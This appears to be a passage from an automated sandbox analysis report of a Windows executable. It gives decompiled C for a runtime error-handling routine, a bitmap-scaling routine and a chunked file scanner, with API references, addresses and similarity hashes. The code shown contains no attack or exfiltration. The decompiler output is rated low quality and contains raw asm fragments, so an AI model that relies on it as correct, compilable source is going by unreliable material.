                                                                                                                Similarity
                                                                                                                • API ID: _memcmp
                                                                                                                • String ID:
                                                                                                                • API String ID: 2931989736-0
                                                                                                                • Opcode ID: 838bb87ad14b4bc8352b1d99423ecc2a6a057efc8c6e73565356ed538dee8348
                                                                                                                • Instruction ID: 8b0ba1e0c574aec3031089bec829716e9e583216945036de44a52515f96e43b3
                                                                                                                • Opcode Fuzzy Hash: 838bb87ad14b4bc8352b1d99423ecc2a6a057efc8c6e73565356ed538dee8348
                                                                                                                • Instruction Fuzzy Hash: ED21A17260061EABEB109E11DE81F7BB7AC9B51758F10A02EFC44BB302F661DD468791
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00EDE015, Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 72%
                                                                                                                			E00EDE015(void* __ebx, void* __ecx, void* __edx) {
				void* __edi;
				void* __esi;
				intOrPtr _t2;
				void* _t3;
				void* _t4;
				intOrPtr _t9;
				void* _t11;
				void* _t20;
				void* _t21;
				void* _t23;
				void* _t25;
				void* _t27;
				void* _t29;
				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0xef159c; // 0x6
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00EDD675(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E00EDF741(_t25, _t36, __eflags,  *0xef159c, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00EDDE79(_t25, _t31, 0xf258fc);
							E00EDD5AA(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00EDD5AA();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00EDD632(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0xef159c; // 0x6
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00EDD675(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E00EDF741(_t27, _t37, __eflags,  *0xef159c, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00EDDE79(_t27, _t32, 0xf258fc);
									E00EDD5AA(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00EDD5AA();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00EDF6EB(_t25, _t37, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00EDF6EB(_t23, _t36, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















                                                                                                                0x00ede015
                                                                                                                0x00ede015
                                                                                                                0x00ede015
                                                                                                                0x00ede01f
                                                                                                                0x00ede021
                                                                                                                0x00ede026
                                                                                                                0x00ede029
                                                                                                                0x00ede037
                                                                                                                0x00ede03e
                                                                                                                0x00ede043
                                                                                                                0x00ede046
                                                                                                                0x00ede049
                                                                                                                0x00ede05b
                                                                                                                0x00ede060
                                                                                                                0x00ede062
                                                                                                                0x00ede06d
                                                                                                                0x00ede074
                                                                                                                0x00ede079
                                                                                                                0x00ede07c
                                                                                                                0x00ede07e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede064
                                                                                                                0x00ede064
                                                                                                                0x00000000
                                                                                                                0x00ede064
                                                                                                                0x00ede04b
                                                                                                                0x00ede04b
                                                                                                                0x00ede04c
                                                                                                                0x00ede04c
                                                                                                                0x00ede051
                                                                                                                0x00ede08c
                                                                                                                0x00ede08d
                                                                                                                0x00ede093
                                                                                                                0x00ede098
                                                                                                                0x00ede09b
                                                                                                                0x00ede09c
                                                                                                                0x00ede09d
                                                                                                                0x00ede0a4
                                                                                                                0x00ede0a6
                                                                                                                0x00ede0a8
                                                                                                                0x00ede0ad
                                                                                                                0x00ede0b0
                                                                                                                0x00ede0be
                                                                                                                0x00ede0ca
                                                                                                                0x00ede0cd
                                                                                                                0x00ede0d0
                                                                                                                0x00ede0e2
                                                                                                                0x00ede0e7
                                                                                                                0x00ede0e9
                                                                                                                0x00ede0f4
                                                                                                                0x00ede0fa
                                                                                                                0x00ede102
                                                                                                                0x00ede104
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede0eb
                                                                                                                0x00ede0eb
                                                                                                                0x00000000
                                                                                                                0x00ede0eb
                                                                                                                0x00ede0d2
                                                                                                                0x00ede0d2
                                                                                                                0x00ede0d3
                                                                                                                0x00ede0d3
                                                                                                                0x00ede106
                                                                                                                0x00ede107
                                                                                                                0x00ede107
                                                                                                                0x00ede0b2
                                                                                                                0x00ede0b8
                                                                                                                0x00ede0bc
                                                                                                                0x00ede10f
                                                                                                                0x00ede110
                                                                                                                0x00ede116
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede0bc
                                                                                                                0x00ede11d
                                                                                                                0x00ede11d
                                                                                                                0x00ede02b
                                                                                                                0x00ede031
                                                                                                                0x00ede035
                                                                                                                0x00ede080
                                                                                                                0x00ede081
                                                                                                                0x00ede08b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ede035

                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,00ED8DFC,?,?,?,00ED8877,00000050), ref: 00EDE019
                                                                                                                • _free.LIBCMT ref: 00EDE04C
                                                                                                                • _free.LIBCMT ref: 00EDE074
                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00EDE081
                                                                                                                • SetLastError.KERNEL32(00000000), ref: 00EDE08D
                                                                                                                • _abort.LIBCMT ref: 00EDE093
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 3160817290-0
                                                                                                                • Opcode ID: 6a1514c6cdcdccc9ac1141ac68faaef10dc97ff29c1e6a04356d32fc343e1080
                                                                                                                • Instruction ID: eed3f7799644a867600c4f91f5a98d20ce0671e778e3d3584303a4720e708871
                                                                                                                • Opcode Fuzzy Hash: 6a1514c6cdcdccc9ac1141ac68faaef10dc97ff29c1e6a04356d32fc343e1080
                                                                                                                • Instruction Fuzzy Hash: 62F0A935108600BAD32233357C4DB6B16A6DFC1774B242517F519BE396EEA0CC07C1A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECF2DB, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 224COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 20%
                                                                                                                			E00ECF2DB(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v84;
				intOrPtr _v116;
				void* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v152;
				signed int _v160;
				intOrPtr _v164;
				char _v180;
				intOrPtr* _v192;
				intOrPtr* _v200;
				signed int _v208;
				char _v212;
				signed int _v216;
				signed int _v220;
				void* _v224;
				char _v228;
				intOrPtr* _v232;
				intOrPtr* _v240;
				void* _v256;
				intOrPtr* _v264;
				void* __edi;
				signed int _t78;
				intOrPtr* _t84;
				void* _t86;
				signed int _t87;
				signed int _t90;
				short _t100;
				signed int _t103;
				intOrPtr* _t104;
				signed int _t107;
				intOrPtr* _t110;
				intOrPtr* _t116;
				intOrPtr* _t128;
				intOrPtr* _t131;
				intOrPtr* _t134;
				void* _t141;
				intOrPtr* _t146;
				intOrPtr* _t158;
				intOrPtr* _t161;
				signed int _t175;
				void* _t177;
				void* _t179;
				intOrPtr* _t181;
				signed int _t195;
				long long* _t197;
				long long _t200;

				_t200 = __fp0;
				if(E00ECF16F() != 0) {
					_t141 = _a4;
					GetObjectW(_t141, 0x18,  &_v68);
					_t195 = _v0;
					asm("cdq");
					_t78 = _v72 * _v4 / _v76;
					if(_t78 < _t195) {
						_t195 = _t78;
					}
					_t177 = 0;
					_push( &_v120);
					_push(0xee83f4);
					_push(1);
					_push(0);
					_push(0xee919c);
					if( *0xf26148() < 0) {
						L19:
						return _t141;
					} else {
						_t84 = _v140;
						 *0xee7220(_t84, _t141, 0, 2,  &_v136, _t179);
						_t86 =  *((intOrPtr*)( *_t84 + 0x54))();
						_t87 = _v160;
						if(_t86 >= 0) {
							_v152 = 0;
							_t181 =  *((intOrPtr*)( *_t87 + 0x28));
							_t146 = _t181;
							 *0xee7220(_t87,  &_v152);
							if( *_t181() >= 0) {
								_t90 = _v160;
								asm("fldz");
								 *_t197 = _t200;
								 *0xee7220(_t90, _v164, 0xee91ac, 0, 0, _t146, _t146, 0);
								if( *((intOrPtr*)( *_t90 + 0x20))() >= 0) {
									E00ED4440(0,  &_v136, 0, 0x2c);
									_v132 = _v84;
									_v136 = 0x28;
									_v128 =  ~_t195;
									_v120 = 0;
									_v124 = 1;
									_t100 = 0x20;
									_v122 = _t100;
									_t103 =  *0xf26030(0,  &_v136, 0,  &_v180, 0, 0);
									_v208 = _t103;
									asm("sbb ecx, ecx");
									if(( ~_t103 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t158 = _v224;
										 *0xee7220(_t158,  &_v212);
										 *((intOrPtr*)( *((intOrPtr*)( *_t158 + 0x2c))))();
										_t116 = _v220;
										 *0xee7220(_t116, _v228, _v116, _t195, 3);
										 *((intOrPtr*)( *_t116 + 0x20))();
										_t175 = _v136;
										_t161 = _v240;
										_v220 = _t175;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t195;
										 *0xee7220(_t161,  &_v228, _t175 << 2, _t175 * _t195 << 2, _v232);
										if( *((intOrPtr*)( *_t161 + 0x1c))() < 0) {
											 *0xf26020(_v256);
										} else {
											_t177 = _v256;
										}
										_t128 = _v264;
										 *0xee7220(_t128);
										 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 8))))();
									}
									_t104 = _v220;
									 *0xee7220(_t104);
									 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 8))))();
									_t107 = _v220;
									 *0xee7220(_t107);
									 *((intOrPtr*)( *((intOrPtr*)( *_t107 + 8))))();
									_t110 = _v232;
									 *0xee7220(_t110);
									 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 8))))();
									if(_t177 != 0) {
										_t141 = _t177;
									}
									L18:
									goto L19;
								}
								_t131 = _v192;
								 *0xee7220(_t131);
								 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 8))))();
							}
							_t134 = _v200;
							 *0xee7220(_t134);
							 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 8))))();
							_t87 = _v208;
						}
						 *0xee7220(_t87);
						 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 8))))();
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00ECF563();
			}



























































                                                                                                                0x00ecf2db
                                                                                                                0x00ecf2e5
                                                                                                                0x00ecf2fe
                                                                                                                0x00ecf30b
                                                                                                                0x00ecf31a
                                                                                                                0x00ecf321
                                                                                                                0x00ecf322
                                                                                                                0x00ecf328
                                                                                                                0x00ecf32a
                                                                                                                0x00ecf32a
                                                                                                                0x00ecf331
                                                                                                                0x00ecf333
                                                                                                                0x00ecf334
                                                                                                                0x00ecf33c
                                                                                                                0x00ecf33d
                                                                                                                0x00ecf33e
                                                                                                                0x00ecf34b
                                                                                                                0x00ecf558
                                                                                                                0x00000000
                                                                                                                0x00ecf351
                                                                                                                0x00ecf351
                                                                                                                0x00ecf365
                                                                                                                0x00ecf36b
                                                                                                                0x00ecf370
                                                                                                                0x00ecf374
                                                                                                                0x00ecf38b
                                                                                                                0x00ecf397
                                                                                                                0x00ecf39a
                                                                                                                0x00ecf39c
                                                                                                                0x00ecf3a6
                                                                                                                0x00ecf3c2
                                                                                                                0x00ecf3c6
                                                                                                                0x00ecf3cd
                                                                                                                0x00ecf3df
                                                                                                                0x00ecf3ea
                                                                                                                0x00ecf40a
                                                                                                                0x00ecf419
                                                                                                                0x00ecf421
                                                                                                                0x00ecf429
                                                                                                                0x00ecf432
                                                                                                                0x00ecf436
                                                                                                                0x00ecf43b
                                                                                                                0x00ecf43e
                                                                                                                0x00ecf44f
                                                                                                                0x00ecf457
                                                                                                                0x00ecf45d
                                                                                                                0x00ecf46b
                                                                                                                0x00ecf471
                                                                                                                0x00ecf482
                                                                                                                0x00ecf488
                                                                                                                0x00ecf48a
                                                                                                                0x00ecf4a2
                                                                                                                0x00ecf4a8
                                                                                                                0x00ecf4ab
                                                                                                                0x00ecf4b8
                                                                                                                0x00ecf4bf
                                                                                                                0x00ecf4c3
                                                                                                                0x00ecf4c7
                                                                                                                0x00ecf4cb
                                                                                                                0x00ecf4e4
                                                                                                                0x00ecf4ef
                                                                                                                0x00ecf4fb
                                                                                                                0x00ecf4f1
                                                                                                                0x00ecf4f1
                                                                                                                0x00ecf4f1
                                                                                                                0x00ecf501
                                                                                                                0x00ecf50d
                                                                                                                0x00ecf513
                                                                                                                0x00ecf513
                                                                                                                0x00ecf515
                                                                                                                0x00ecf521
                                                                                                                0x00ecf527
                                                                                                                0x00ecf529
                                                                                                                0x00ecf535
                                                                                                                0x00ecf53b
                                                                                                                0x00ecf53d
                                                                                                                0x00ecf549
                                                                                                                0x00ecf54f
                                                                                                                0x00ecf553
                                                                                                                0x00ecf555
                                                                                                                0x00ecf555
                                                                                                                0x00ecf557
                                                                                                                0x00000000
                                                                                                                0x00ecf557
                                                                                                                0x00ecf3ec
                                                                                                                0x00ecf3f8
                                                                                                                0x00ecf3fe
                                                                                                                0x00ecf3fe
                                                                                                                0x00ecf3a8
                                                                                                                0x00ecf3b4
                                                                                                                0x00ecf3ba
                                                                                                                0x00ecf3bc
                                                                                                                0x00ecf3bc
                                                                                                                0x00ecf37e
                                                                                                                0x00ecf384
                                                                                                                0x00000000
                                                                                                                0x00ecf384
                                                                                                                0x00ecf34b
                                                                                                                0x00ecf2e7
                                                                                                                0x00ecf2eb
                                                                                                                0x00ecf2ef
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00ECF16F: GetDC.USER32(00000000), ref: 00ECF173
                                                                                                                  • Part of subcall function 00ECF16F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00ECF17E
                                                                                                                  • Part of subcall function 00ECF16F: ReleaseDC.USER32(00000000,00000000), ref: 00ECF189
                                                                                                                • GetObjectW.GDI32(?,00000018,?), ref: 00ECF30B
                                                                                                                  • Part of subcall function 00ECF563: GetDC.USER32(00000000), ref: 00ECF56C
                                                                                                                  • Part of subcall function 00ECF563: GetObjectW.GDI32(?,00000018,?,?,?,?,?,?,?,?,?,00ECF2F8,?,?,?), ref: 00ECF59B
                                                                                                                  • Part of subcall function 00ECF563: ReleaseDC.USER32(00000000,?), ref: 00ECF633
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ObjectRelease$CapsDevice
                                                                                                                • String ID: ($4-$9,$a,
                                                                                                                • API String ID: 1061551593-557942806
                                                                                                                • Opcode ID: 1edc6f0bc3911446d017d415ca3643205a5de910545abdf2705e5693cf599295
                                                                                                                • Instruction ID: 106dbe019f68d55e82a487167e8059c0ae82c135320519ca6a4871a8c7538d8a
                                                                                                                • Opcode Fuzzy Hash: 1edc6f0bc3911446d017d415ca3643205a5de910545abdf2705e5693cf599295
                                                                                                                • Instruction Fuzzy Hash: 7D81E6756082949FC714DF65E884E2ABBE9FB88704F00452DF596EB260DB31ED06CB51
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECCA14, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 220COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 49%
                                                                                                                			E00ECCA14(signed int __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _t26;
				signed int _t30;
				signed int _t31;
				intOrPtr _t38;
				signed int _t39;
				signed int _t40;
				intOrPtr _t44;
				signed int _t50;
				intOrPtr _t53;
				signed int _t58;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				intOrPtr _t67;
				signed int _t71;
				signed int _t76;
				intOrPtr _t83;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				intOrPtr* _t87;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;
				intOrPtr _t93;
				signed int _t94;
				signed int _t95;
				signed int _t101;
				signed int _t102;
				intOrPtr _t104;
				void* _t105;
				void* _t106;
				signed int _t113;

				_t85 = __edx;
				_t102 =  *0xf0b5c4; // 0x0
				_t62 = 0;
				_t93 =  *0xf0b5c0; // 0x78e42b
				_t67 = E00ED3930(_t93, _t102, 0x2000, 0);
				_t86 = _t85;
				_t26 = _v0;
				asm("cdq");
				_v20 = _t67;
				_v24 = _t86;
				_t106 = _t86 - _t85;
				if(_t106 < 0 || _t106 <= 0 && _t67 <= _t26) {
					_t94 = _t93 - _t67;
					__eflags = _t94;
					 *0xf0b5d8 = _t94;
					asm("sbb ebp, edi");
					 *0xf0b5dc = _t102;
					goto L14;
				} else {
					_t89 =  *0xf0b5b8; // 0x0
					_t44 =  *0xf0b5c0; // 0x78e42b
					asm("sbb ebp, [esp+0x14]");
					 *0xee7220(_t44 - _t67, _t102, 0);
					 *((intOrPtr*)( *_t89 + 0x10))();
					_t90 =  *0xf0b5b8; // 0x0
					 *0xee7220();
					_t50 =  *((intOrPtr*)( *((intOrPtr*)( *_t90 + 0x14))))();
					_t91 =  *0xf0b5b8; // 0x0
					_t104 = _v16;
					 *0xf0b5d8 = _t50;
					 *0xf0b5dc = _t85;
					 *0xee7220( *0xf0b594, _t104);
					_t53 =  *((intOrPtr*)( *((intOrPtr*)( *_t91 + 0xc))))();
					asm("cdq");
					_t83 = _t53;
					_t101 = _t85;
					 *0xf0b5a0 = _t83;
					asm("cdq");
					 *0xf0b5a4 = _t101;
					if(_t83 == _t104 && _t101 == _t85) {
						_t84 =  *0xf0b594; // 0x0
						_t58 = _t84 - _v4 + 0xfffffffc + _t104;
						while(1) {
							 *0xf0b598 = _t58;
							if(_t58 < _t84) {
								break;
							}
							__eflags =  *_t58 - 0x50;
							if( *_t58 != 0x50) {
								L8:
								_t58 = _t58 - 1;
								__eflags = _t58;
								continue;
							} else {
								_t59 = E00ED51D4(_t58, _v8, 4);
								_t84 =  *0xf0b594; // 0x0
								_t105 = _t105 + 0xc;
								__eflags = _t59;
								_t58 =  *0xf0b598; // 0x31dc72d
								if(_t59 == 0) {
									asm("cdq");
									 *0xf0b5a0 =  *0xf0b5a0 - _t58 - _t84;
									asm("sbb [0xf0b5a4], edx");
									_t62 = 1;
									__eflags = 1;
								} else {
									goto L8;
								}
							}
							L12:
							E00ED4C60( *0xf0b5ec, _t84, 3);
							_t102 =  *0xf0b5dc; // 0x0
							_t105 = _t105 + 0xc;
							_t94 =  *0xf0b5d8; // 0x78e000
							L14:
							asm("sbb eax, edi");
							asm("adc eax, 0x0");
							_t71 = E00ED3660(_a4 - _v4 + 0x1fff, _a8, 0x2000, 0);
							_t30 = 1;
							_v24 = _t71;
							_v20 = 1;
							if(_t62 == 0) {
								L15:
								while(_t30 <= _t71) {
									_t113 = _t102;
									if(_t113 >= 0 && (_t113 > 0 || _t94 >= 0x2000)) {
										_t87 =  *0xf0b5b8; // 0x0
										_t95 = _t94 + 0xffffe000;
										 *0xf0b5d8 = _t95;
										asm("adc ebp, 0xffffffff");
										 *0xf0b5dc = _t102;
										 *0xee7220(_t95, _t102, 0);
										 *((intOrPtr*)( *((intOrPtr*)( *_t87 + 0x10))))();
										_t88 =  *0xf0b5b8; // 0x0
										 *0xee7220( *0xf0b594, 0x2000);
										_t38 =  *((intOrPtr*)( *((intOrPtr*)( *_t88 + 0xc))))();
										asm("cdq");
										 *0xf0b5a0 = _t38;
										 *0xf0b5a4 = _t85;
										if(_t38 == 0x2000 && _t85 == 0) {
											_t76 =  *0xf0b594; // 0x0
											_t19 = _t76 + 0x1fff; // 0x1fff
											_t39 = _t19;
											while(1) {
												 *0xf0b598 = _t39;
												if(_t39 < _t76) {
													break;
												}
												__eflags =  *_t39 - 0x50;
												if( *_t39 != 0x50) {
													L24:
													_t39 = _t39 - 1;
													__eflags = _t39;
													continue;
												} else {
													_t40 = E00ED51D4(_t39, _v8, 4);
													_t76 =  *0xf0b594; // 0x0
													_t105 = _t105 + 0xc;
													__eflags = _t40;
													_t39 =  *0xf0b598; // 0x31dc72d
													if(_t40 == 0) {
														asm("cdq");
														 *0xf0b5a0 =  *0xf0b5a0 - _t39 - _t76;
														asm("sbb [0xf0b5a4], edx");
														_t62 = 1;
														__eflags = 1;
													} else {
														goto L24;
													}
												}
												L28:
												E00ED4C60( *0xf0b5ec, _t76, 3);
												_t105 = _t105 + 0xc;
												_t30 = _v24 + 1;
												_v24 = _t30;
												if(_t62 == 0) {
													_t102 =  *0xf0b5dc; // 0x0
													_t94 =  *0xf0b5d8; // 0x78e000
													_t71 = _v28;
													goto L15;
												}
												goto L30;
											}
											goto L28;
										}
									}
									goto L30;
								}
							}
							goto L30;
						}
						goto L12;
					}
				}
				L30:
				_t31 =  *0xf0b594; // 0x0
				__eflags =  *0xf0b598 - _t31; // 0x31dc72d
				if(__eflags < 0) {
					 *0xf0b5d8 =  *0xf0b5d8 | 0xffffffff;
					 *0xf0b5dc =  *0xf0b5dc | 0xffffffff;
					__eflags =  *0xf0b5dc;
					 *0xf0b598 = _t31;
				}
				asm("sbb ebx, ebx");
				_t64 =  ~_t62 & 0xfffffffe;
				__eflags = _t64;
				_t24 = _t64 + 2; // 0x2
				return _t24;
			}












































                                                                                                                0x00ecca14
                                                                                                                0x00ecca18
                                                                                                                0x00ecca1e
                                                                                                                0x00ecca21
                                                                                                                0x00ecca35
                                                                                                                0x00ecca37
                                                                                                                0x00ecca39
                                                                                                                0x00ecca3d
                                                                                                                0x00ecca3e
                                                                                                                0x00ecca42
                                                                                                                0x00ecca46
                                                                                                                0x00ecca48
                                                                                                                0x00eccb5c
                                                                                                                0x00eccb5c
                                                                                                                0x00eccb5e
                                                                                                                0x00eccb64
                                                                                                                0x00eccb66
                                                                                                                0x00000000
                                                                                                                0x00ecca58
                                                                                                                0x00ecca58
                                                                                                                0x00ecca5e
                                                                                                                0x00ecca69
                                                                                                                0x00ecca72
                                                                                                                0x00ecca7a
                                                                                                                0x00ecca7d
                                                                                                                0x00ecca8a
                                                                                                                0x00ecca92
                                                                                                                0x00ecca94
                                                                                                                0x00ecca9a
                                                                                                                0x00ecca9e
                                                                                                                0x00eccaa3
                                                                                                                0x00eccab7
                                                                                                                0x00eccabf
                                                                                                                0x00eccac1
                                                                                                                0x00eccac2
                                                                                                                0x00eccac4
                                                                                                                0x00eccac8
                                                                                                                0x00eccace
                                                                                                                0x00eccacf
                                                                                                                0x00eccad7
                                                                                                                0x00eccae5
                                                                                                                0x00eccaf4
                                                                                                                0x00eccb1c
                                                                                                                0x00eccb1c
                                                                                                                0x00eccb23
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccaf8
                                                                                                                0x00eccafb
                                                                                                                0x00eccb1b
                                                                                                                0x00eccb1b
                                                                                                                0x00eccb1b
                                                                                                                0x00000000
                                                                                                                0x00eccafd
                                                                                                                0x00eccb04
                                                                                                                0x00eccb09
                                                                                                                0x00eccb0f
                                                                                                                0x00eccb12
                                                                                                                0x00eccb14
                                                                                                                0x00eccb19
                                                                                                                0x00eccb29
                                                                                                                0x00eccb2a
                                                                                                                0x00eccb30
                                                                                                                0x00eccb38
                                                                                                                0x00eccb38
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccb19
                                                                                                                0x00eccb39
                                                                                                                0x00eccb42
                                                                                                                0x00eccb47
                                                                                                                0x00eccb4d
                                                                                                                0x00eccb50
                                                                                                                0x00eccb6c
                                                                                                                0x00eccb78
                                                                                                                0x00eccb87
                                                                                                                0x00eccb91
                                                                                                                0x00eccb95
                                                                                                                0x00eccb96
                                                                                                                0x00eccb9a
                                                                                                                0x00eccba0
                                                                                                                0x00000000
                                                                                                                0x00eccba6
                                                                                                                0x00eccbae
                                                                                                                0x00eccbb0
                                                                                                                0x00eccbc4
                                                                                                                0x00eccbca
                                                                                                                0x00eccbd0
                                                                                                                0x00eccbd6
                                                                                                                0x00eccbdb
                                                                                                                0x00eccbea
                                                                                                                0x00eccbf2
                                                                                                                0x00eccbf4
                                                                                                                0x00eccc0d
                                                                                                                0x00eccc15
                                                                                                                0x00eccc17
                                                                                                                0x00eccc18
                                                                                                                0x00eccc1d
                                                                                                                0x00eccc25
                                                                                                                0x00eccc33
                                                                                                                0x00eccc39
                                                                                                                0x00eccc39
                                                                                                                0x00eccc65
                                                                                                                0x00eccc65
                                                                                                                0x00eccc6c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccc41
                                                                                                                0x00eccc44
                                                                                                                0x00eccc64
                                                                                                                0x00eccc64
                                                                                                                0x00eccc64
                                                                                                                0x00000000
                                                                                                                0x00eccc46
                                                                                                                0x00eccc4d
                                                                                                                0x00eccc52
                                                                                                                0x00eccc58
                                                                                                                0x00eccc5b
                                                                                                                0x00eccc5d
                                                                                                                0x00eccc62
                                                                                                                0x00eccc72
                                                                                                                0x00eccc73
                                                                                                                0x00eccc79
                                                                                                                0x00eccc81
                                                                                                                0x00eccc81
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00eccc62
                                                                                                                0x00eccc82
                                                                                                                0x00eccc8b
                                                                                                                0x00eccc94
                                                                                                                0x00eccc97
                                                                                                                0x00eccc98
                                                                                                                0x00eccc9e
                                                                                                                0x00eccca0
                                                                                                                0x00eccca6
                                                                                                                0x00ecccac
                                                                                                                0x00000000
                                                                                                                0x00ecccac
                                                                                                                0x00000000
                                                                                                                0x00eccc9e
                                                                                                                0x00000000
                                                                                                                0x00eccc6e
                                                                                                                0x00eccc25
                                                                                                                0x00000000
                                                                                                                0x00eccbb0
                                                                                                                0x00eccba6
                                                                                                                0x00000000
                                                                                                                0x00eccba0
                                                                                                                0x00000000
                                                                                                                0x00eccb25
                                                                                                                0x00eccad7
                                                                                                                0x00ecccb5
                                                                                                                0x00ecccb5
                                                                                                                0x00ecccba
                                                                                                                0x00ecccc0
                                                                                                                0x00ecccc2
                                                                                                                0x00ecccc9
                                                                                                                0x00ecccc9
                                                                                                                0x00ecccd0
                                                                                                                0x00ecccd0
                                                                                                                0x00ecccd8
                                                                                                                0x00ecccda
                                                                                                                0x00ecccda
                                                                                                                0x00ecccdf
                                                                                                                0x00eccce5

                                                                                                                APIs
                                                                                                                • __allrem.LIBCMT ref: 00ECCA30
                                                                                                                • _memcmp.LIBVCRUNTIME ref: 00ECCB04
                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00ECCB8C
                                                                                                                • _memcmp.LIBVCRUNTIME ref: 00ECCC4D
                                                                                                                Strings
                                                                                                                Memory Dump Source
